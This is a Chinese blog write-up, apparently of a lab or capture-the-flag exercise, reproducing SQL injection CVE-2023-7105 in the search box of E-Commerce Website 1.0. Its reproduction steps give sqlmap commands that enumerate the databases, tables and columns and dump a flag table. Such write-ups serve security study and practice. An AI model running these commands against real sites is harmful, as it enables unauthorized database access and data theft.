E-Commerce Website 搜索框注入漏洞(CVE-2023-7105)

一、漏洞概述

E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。

二、影响范围

E-Commerce Website 1.0

三、访问页面

四、漏洞复现

1、在页面搜索框任意输入点击搜索。

2、抓包,复制POST包数据到1.txt文件,放到sqlmap工具目录下。

3、执行

sqlmap.py -r 1.txt --batch --dbs

#确定了存在sql注入

4、使用sqlmap获取flag

sqlmap.py -r 1.txt --batch --dbs                    //获取数据库名称
sqlmap.py -r 1.txt --batch -D electricks --tables    //根据数据库名获取表名
sqlmap.py -r 1.txt --batch -D electricks -T flllaaaag --columns    //获取列名
sqlmap.py -r 1.txt --batch -D electricks -T flllaaaag -C flag  --dump //获取列数据

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值